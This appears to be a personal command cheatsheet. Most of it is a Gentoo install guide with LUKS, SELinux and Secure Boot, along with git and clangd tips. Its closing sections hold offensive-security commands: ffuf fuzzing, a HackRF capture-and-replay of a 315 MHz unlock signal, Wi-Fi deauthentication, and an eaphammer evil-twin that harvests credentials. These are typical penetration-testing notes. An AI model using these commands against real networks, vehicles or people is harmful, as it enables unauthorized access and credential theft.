links https://www.gentoo.org/downloads/#amd64-advanced
tar xpvf stage3-*.tar.xz --xattrs-include='*.*' --numeric-owner
  • configure compile options
COMMON_FLAGS="-march=native -O2 -pipe"
FEATURES="${FEATURES} getbinpkg"
FEATURES="${FEATURES} binpkg-request-signature"
CFLAGS="${COMMON_FLAGS}"
CXXFLAGS="${COMMON_FLAGS}"
FCFLAGS="${COMMON_FLAGS}"
FFLAGS="${COMMON_FLAGS}"
MAKEOPTS="-j8"
VIDEO_CARDS="intel nouveau"
ACCEPT_LICENSE="-* @FREE @BINARY-REDISTRIBUTABLE"
POLICY_TYPES="targeted"
# dist-kernel will allow kernel modules to automatically rebuild after kernel upgrade
USE="unicode X unconfined ubac peer_perms elogind pulseaudio alsa grub dist-kernel"
LC_MESSAGES=C.utf8
GRUB_PLATFORMS="efi-64"
EMERGE_DEFAULT_OPTS="--getbinpkg"
  • chroot
cp --dereference /etc/resolv.conf /mnt/gentoo/etc/
arch-chroot /mnt/gentoo
source /etc/profile
export PS1="(chroot) ${PS1}"
  • prepare for bootloader
mkdir /efi
mount /dev/sda1 /efi
  • portage sync
emerge-webrsync
eselect news list
eselect news read
  • choose profile
eselect profile set 43
eselect profile list
# default/linux/amd64/23.0/hardened/selinux (stable) *
  • configure the binhost
### /etc/portage/binrepos.conf/gentoobinhost.conf
[binhost]
priority = 9999
sync-uri = https://distfiles.gentoo.org/releases/<arch>/binpackages/<profile>/x86-64/


### run
getuto
  • configure licensing
echo "sys-kernel/linux-firmware @BINARY-REDISTRIBUTABLE" | tee -a /etc/portage/package.license
echo "sys-firmware/intel-microcode intel-ucode" | tee -a /etc/portage/package.accept_keywords
echo "sys-firmware/intel-microcode ~amd64" | tee -a /etc/portage/package.accept_keywords
  • update @world
emerge --ask --verbose --update --deep --newuse @world
emerge --ask --depclean
  • configure timezones
echo "Europe/Germany" > /etc/timezone
emerge --config sys-libs/timezone-data
  • configure locales
### /etc/locale.gen
en_US ISO-8859-1
en_US.UTF-8 UTF-8

### run the following
locale-gen
eselect locale set 2
# [2]  C.utf8
env-update && source /etc/profile && export PS1="(chroot) ${PS1}"
  • install microcode and firmware
# microcode for AMD is also in this package:
emerge --ask sys-kernel/linux-firmware
emerge --ask sys-firmware/intel-microcode
emerge -av cryptsetup btrfs btrfs-progs
  • configure installkernel with dracut
### /etc/portage/package.use/installkernel
sys-kernel/installkernel dracut grub
  • installer-side configure dracut dracut will be run automatically by emerge gentoo-kernel-bin and generate an initramfs inside /boot
### /etc/dracut.conf
# minimum components to decrypt LUKS volumes using dracut
add_dracutmodules+=" crypt crypt-gpg dm rootfs-block btrfs "
# Embed cmdline parameters for rootfs decryption (obtain uuids with `lsblk -o name,uuid`)
kernel_cmdline+=" loglevel=6 rd.luks.key=/crypt_key.luks.gpg:UUID=0e86bef-30f8-4e3b-ae35-3fa2c6ae705b rootfstype=btrfs rd.luks.uuid=4bb45bd6-9ed9-44b3-b547-b411079f043b root=UUID=cb070f9e-da0e-4bc5-825c-b01bb2707704 "


### /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="loglevel=6"
GRUB_DEVICE=UUID=cb070f9e-da0e-4bc5-825c-b01bb2707704

emerge -av gentoo-sources
emerge -av dracut
emerge -av gentoo-kernel-bin
emerge -av installkernel
emerge --depclean

# The kernel modules in the sys-kernel/gentoo-kernel-bin are already signed
# The kernel image in the sys-kernel/gentoo-kernel-bin is already signed
  • configure fstab
### lsblk -o name,uuid
NAME        UUID
sda
├──sda1     BDF2-0139
└──sda2     0e86bef-30f8-4e3b-ae35-3fa2c6ae705b
nvme0n1
└─nvme0n1p1 4bb45bd6-9ed9-44b3-b547-b411079f043b
  └─root    cb070f9e-da0e-4bc5-825c-b01bb2707704

# <fs>                                          <mountpoint>    <type>          <opts>          <dump/pass>
UUID=BDF2-0139                                  /efi            vfat            noauto,noatime  0 1
LABEL=boot                                      /boot           ext4            noauto,noatime  0 1
LABEL=rootfs                                    /               btrfs           defaults        0 1
  • define hostname
echo tux > /etc/hostname
  • setup dhcpcd
emerge --ask net-misc/dhcpcd
rc-update add dhcpcd default
rc-service dhcpcd start
  • setup hosts
192.168.1.69    dc-1.aisp.example.local
127.0.0.1       localhost
::1             localhost
  • general system setup
passwd
emerge --ask net-misc/chrony
  • defining bootloader
emerge -av sys-boot/grub
grub-install --efi-directory=/efi
grub-mkconfig -o /boot/grub/grub.cfg
  • create swapfile
btrfs subvolume create swap_vol
chattr +C swap_vol
fallocate -l 4G swap_vol/swapfile
chmod 600 swap_vol/swapfile
mkswap swap_vol/swapfile
swapon swap_vol/swapfile

### /etc/fstab
/swap_vol/swapfile none swap sw 0 0
  • SELinux-relabel the fs (opt)
mkdir /mnt/gentoo
mount -o bind / /mnt/gentoo
semodule -B
# initialize security contexts fileds on the fs
setfiles -r /mnt/gentoo /etc/selinux/targeted/contexts/files/file_contexts /mnt/gentoo/{dev,efi,proc,run,sys,tmp,etc,home}
umount /mnt/gentoo
semanage fcontext -a -t swapfile_t "/swap_vol/swapfile"
restorecon /swap_vol/swapfile
# relabel the entire fs
# (rlpkg is a gentoo specific tool that does the same thing as restorecon but for the entire fs)
rlpkg -a -r

### add kernel parameters in /etc/default/grub
GRUB_CMDLINE_LINUX=".....................  lsm=selinux"
grub-mkconfig
  • SELinux user map
# map an existing administrative user to a domain other that unconfined_u
semanage login -a -s staff_u john
semanage login -a -s staff_u root
# -F is a key parameter here!!!
restorecon -RvF /home/john

semanage user -m -R "staff_r sysadm_r system_r" root
semanage user -m -R "staff_r sysadm_r system_r" staff_u
  • /etc/sudoers
%wheel ALL=(ALL) TYPE=sysadm_t ROLE=sysadm_r ALL
  • setup shim (secure boot) (optional) - the Secure Boot signature of vmlinuz is verified by firmware (UEFI), or sometimes by Shim (which overrides the firmware's SB verification). boot loaders usually call out to the firmware (or sometimes deliberately to Shim) to do the check. - the signatures of kernel modules are verified by the kernel itself, as the kernel is what handles its own module loading. there's no signature for the initramfs (if you use one), so there's no component that verifies it either, unless you combine it into vmlinuz in some way or other - kernel modules are signed using the certs/signing_key.pem file in kernel sources, this key is embedded into the kernel image upon build. modules are signed during modules_install phase of a kernel build.
# ensure secureboot USE is enabled globally

# generate keys
mkdir /certs && cd /certs
sudo openssl req -new -x509 -newkey rsa:2048 -subj "/CN=SecureBootSign/" -keyout sbs.key -out sbs.crt -days 3650 -nodes -sha256
# Convert to DER format
sudo openssl x509 -in sbs.crt -out sbs.cer -outform DER

### make.conf
# add the following in order for system to automatically sign all efi binaries with these keys
# this keypair should be in PEM format (BEGIN CERTIFICATE, BEGIN PRIVATE KEY)
USE="... secureboot modules-sign ..."
SECUREBOOT_SIGN_KEY="/certs/sbs.key"
SECUREBOOT_SIGN_CERT="/certs/sbs.crt"
MODULES_SIGN_KEY="/certs/sbs.key"
MODULES_SIGN_CERT="/certs/sbs.crt"


### !!! SHIM only checks signatures of the boot loader and kernel, but not the GRUB config file or initramfs
emerge sys-boot/shim sys-boot/mokutil
echo "sys-boot/grub **" | sudo tee -a /etc/portage/package.accept_keywords/main
emerge -avuU sys-boot/grub
### ALERT!!!! if you will do `cp /usr/lib/grub/grub-x86_64.efi.signed /efi/EFI/Gentoo/grubx64.efi` add grub config to EFI
### because this prebuild signed grub reads config from there instead of default /boot/grub/grub.cfg
# grub-mkconfig reads info from /etc/default/grub
echo "GRUB_CFG=/efi/EFI/Gentoo/grub.cfg" >> /etc/env.d/99grub


# add EFI entry for system to boot shim instead of GRUB
cp /usr/share/shim/BOOTX64.EFI /efi/EFI/Gentoo/shimx64.efi
cp /usr/share/shim/mmx64.efi /efi/EFI/Gentoo/mmx64.efi
cp /usr/lib/grub/grub-x86_64.efi.signed /efi/EFI/Gentoo/grubx64.efi
# grub-x86_64.efi.signed is automatically signed with SECUREBOOT_SIGN_CERT
sbverify --list /efi/EFI/gentoo/grubx64.efi

# add an EFI entry to point to shimx64.efi binary instead of grub
efibootmgr --disk /dev/sda --part 1 --create -L "GRUB via Shim" -l '\EFI\Gentoo\shimx64.efi'

# before running ensure /boot is mounted and kernels are there
grub-mkconfig -o /efi/EFI/gentoo/grub.cfg
# check that the config contains a menu entry for gentoo
grep "^menuentry" /efi/EFI/gentoo/grub.cfg

### NOT REQUIRED IF YOU USE gentoo-kernel-bin
# if you use gentoo-kernel-bin - it and it's modules automatically signed if USE="secureboot modules-sign" are enabled
# IF NOT - sign kernel and/or modules
sbsign --key ${SECUREBOOT_SIGN_KEY} --cert ${SECUREBOOT_SIGN_CERT} --output /boot/EFI/Gentoo/kernel-x.y.z-gentoo.efi /boot/EFI/Gentoo/kernel-x.y.z-gentoo.efi

### OPTIONAL: set EFI shell

# verify that the modules are signed by running hexdump against a random module
hexdump -C /usr/lib/modules/6.6.47-gentoo-dist/kernel/arch/x86/crypto/camellia-aesni-avx-x86_64.ko
# it should display "Module signature appended" at the end of a hexdump

### Add to MOK
# convert keys to DER for MOK
openssl x509 -inform pem -in ${SECUREBOOT_SIGN_CERT} -outform der -out /boot/sbcert.der
# import key into MOK (the password does NOT matter, it's a one time and required only during the first reboot)
sudo su -
mokutil --import /boot/sbcert.der
mokutil --ignore-keyring --import /usr/src/linux-6.6.47-gentoo-dist/certs/signing_key.x509
# qwerty123
reboot
# OPEN MOKManager => Enroll new key

# on next reboot you should enable validation
mokutil --sb-state # validate the secure boot and shim validation state, if not enabled:
mokutil --enable-validation
reboot
# OPEN UEFI => Security => Enable secure boot => SAVE and EXIT
# the MOKMANAGER should open
# OPEN MOKManager => change secure boot state => enter password you set earlier => Yes
  • Make sure to lock UEFI with a strong passphrase and enable DMA protection!

Recon

FFuF

ffuf -c [colorize output] -mc 200,301 [match status codes] -fc 404 [exclude status codes from response] -u https://google.com/FUZZ -w [WORDLIST_PATH] -recursion -e .exe [files with .exe] -s [silent] -of html [output in html file] -o output-file -b "cookie1=smth; cookie2=smth" -H "X-Custom-Header: smth" -se [stop on errors] -p 2 [2 second delay] -t 150 [threads]


################
### EXAMPLES ###
################
# classic directory FUZZ
ffuf -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

ffuf -c -mc 200,301 -fc 404 -u http://example.com/FUZZ -w ~/seclists/discovery/web-content/raft-large-words.txt -t 150 -e '.php,.html'
ffuf -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-large-words.txt -t 150 -e $(cat /root/SecLists/Discovery/Web-Content/web-extensions-comma_separated.txt)

# FUZZ HTTP verbs
ffuf -c -u 'http://WIN-KML6TP4LOOL.CONTOSO.ORG' -X FUZZ -w ~/SecLists/Fuzzing/http-request-methods.txt

# recursive directory FUZZ
ffuf -c -fc 404 -u http://example.com/FUZZ -recursion -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

# FUZZ when on different subdomain (without adding it to /etc/hosts)
ffuf -c -H 'Host: something.example.com' -w '~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt' -u 'http://example.com/FUZZ'

# single IP subdomain enumeration (note that `-u` param is only for IP discovery, to enumerate subdomains on a specific IP you need to FUZZ Host header) (if you wanna enumerate DNS instead see * gobuster)
ffuf -c -H 'Host: FUZZ.example.com' -w '~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt' -u 'http://example.com'

# multiple wordlists (default mode is clusterbomb (all combinations))
ffuf -c -mode pitchfork -H 'Host: SUBD.example.com' -u 'http://example.com/PATH' -w '~/wordlist_subdomain.txt:SUBD' -w '~/wordlist_path.txt:PATH' -replay-proxy 'http://127.0.0.1:8080'

# FUZZ ports in the request file
# (let's say we have a plain request from burp with a SSRF and we wanna enumerate ports)
# see [HTB Editorial]{https://youtu.be/eggi_GQo9fk?t=467}
ffuf -request ssrf.txt -request-proto http -w <(seq 1 65535)

# rate limit
ffuf -rate 20 -c -fc 404 -u http://example.com/FUZZ -w ~/SecLists/Discovery/Web-Content/raft-medium-words.txt

# forward to burp
# in burp, i add new proxy at 3333 and tell it to forward to 9595
ffuf -c -u http://localhost:3333/ # ...

git

Example usage

let's say 2 machines (RW-1 and RW-2) want to fully sync master

### RW-1 commit changes to git origin
git checkout -b SOME-BRANCH-1       # create some-branch and switch, make some changes
# then at home:
git add --all
git commit -m "mod"
git push origin SOME-BRANCH-1


### REPEAT THE SAME ON RW-2 (i.e. commit changes), then:
git checkout -b SOME-BRANCH-2       # create some-branch and switch, make some changes
# then at home:
git add --all
git commit -m "mod"
git push origin SOME-BRANCH-2


### MERGE and SYNC (valid for both machines)
# let's say we're on RW-2 and we want to merge all branches into origin/master
git fetch --all -Pp                 # fetch current state
git checkout master                 # switch to master for merging
git merge SOME-BRANCH-2             # merge 1st
git merge origin/SOME-BRANCH-1      # merge 2nd
# if conflicts arise (if you modified the same line) - delete all git-added lines and leave 
# only things that're needed. 
# e.g. remove all <<<<<<,  ======, >>>>>> lines edit the file to the state you wish to commit
# Then run:
# git add .
# git commit -m "mod"
git push origin master              # push changes to repo
git checkout SOME-BRANCH-2          # don't forget to switch to machine's repo for future work


### SYNC the working branch (DO THAT ONLY AFTER YOU COMMIT CHANGES)
# let's assume that the worse_branch is SOME-BRANCH-1 and the better_branch master
git fetch --all -Pp

git checkout master           # switch to master
git pull                      # sync changes in local master with fetched master

git branch -d SOME-BRANCH-1   # delete SOME-BRANCH-1
git checkout -b SOME-BRANCH-1 master # create new SOME-BRANCH-1 from synced master

.gitignore

# ignore a file
DEV_README.md
# ignore all files inside the directory
ImpTgsReq/obj/*

# after adding .gitignore you can do the following to get rid of unneded tracked files
git rm -r --cached .
git add .
git commit -m "fixed untracked files"

symlink to a directory is to be handled as a file in .gitignore for correct interpretation

find lost commit

# find lost commit in reflog tree
git reflog
git reset --hard e870e41

create orphan branch (no commit history)

git checkout --orphan main
git add . && git commit -m 'initial'
git push origin main

useful commands

# if you don't like the commit, reset to the previous 
# one and keep the changes to files, but unstage them
git reset
# if you wanna keep the changes staged
git reset --soft HEAD~1

# unstage the file/dir
git restore --staged dev.txt

# commit all, even unstaged
git commit --all -m "$COMMIT_MESSAGE"

clangd

mingw

While setting up C crossdev environment on GNU/Linux for Microsoft Windows you may face an issue with clangd stating "Only Win32 target is supported!". Even after you include the correct-architecture directory in CompileFlags for header search with -I compiler flag, do not forget to change the compiler itself by specifying the "Compiler" key in project's .clangd configuration file.

CompileFlags:
    Add: [-I/usr/lib/mingw64-toolchain/x86_64-w64-mingw32/include]
    Compiler: /usr/lib/mingw64-toolchain/bin/x86_64-w64-mingw32-c++

The error appears because of the #if directive statement checking

clangd --check=./main.cpp 2>&1 | grep 'E\['

RF

HackRF

flash

firmware

# run the following command and reconnect the board
sudo hackrf_spiflash -w hackrf_one_usb.bin

# run to ensure firmware got flashed
sudo hackrf_info

Replay

# capture on 315'000.000kHz (315.000 MHz) and save to a file called "unlock.rx" and sample rate of 2'000.000 kHz (2 MHz)
sudo hackrf_transfer -s 2000000 -f 315000000 -r unlock.rx

# transmit file contents with 47 db (maximum) gain
sudo hackrf_transfer -s 2000000 -f 315000000 -t unlock.rx -x 47

802.11

Deauth

# send unicast deauth frame against a specific station (client) 
aireplay-ng -0 1 -a "CE:9D:A2:E2:9B:40" -c "10:F0:05:16:F6:9E" wlp1s0f0u8

# send broadcast deauth frame impersonating an AP
aireplay-ng -0 1 -a "CE:9D:A2:E2:9B:40" wlp1s0f0u8

eaphammer WPA-E ET

eaphammer --cert-wizard
# make sure all is checked out

# working. if certificate validation 
# is not configured on supplicant -
# supplicant autoconnects and gets 
# successfully downgraded to GTC if MSCHAPv2
# is not explicitly specified
./eaphammer --bssid 1C:7E:E5:97:79:B1 \
        --essid Example \
        --channel 2 \
        --interface wlan0 \
        --auth wpa-eap \
        --creds

IMPACT:

  • inner GTC : plaintext credentials if
  • inner MSCHAPv2 : NetNTLMv1 hash

Useful

set a specific channel to a wireless interface:

iwconfig wlp1s0f0u8 channel 5

place a wireless card into monitor:

airmon-ng start wlan0

### ALTERNATIVELY:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

aurodump-ng

  • use "a" key to collapse sections
  • if doesn't work try replugging the adapter, It should work right after replugging by just running airodump-ng
### SECTIONS
## APs:
# BSSID   - AP MAC address
# ESSID   - AP readable identitier
# CH      - AP channel (frequency range)

## STATIONS:
# BSSID   - MAC of an AP the station is connected to
# Probes  - ESSIDs this client has probed 
# STATION - MAC of a station


###############
### GENERAL ###
###############
# scan near APs
airodump-ng wlan0
# scan specific AP
airodump-ng --bssid CE:9D:A2:E2:9B:40 wlan0

Cellular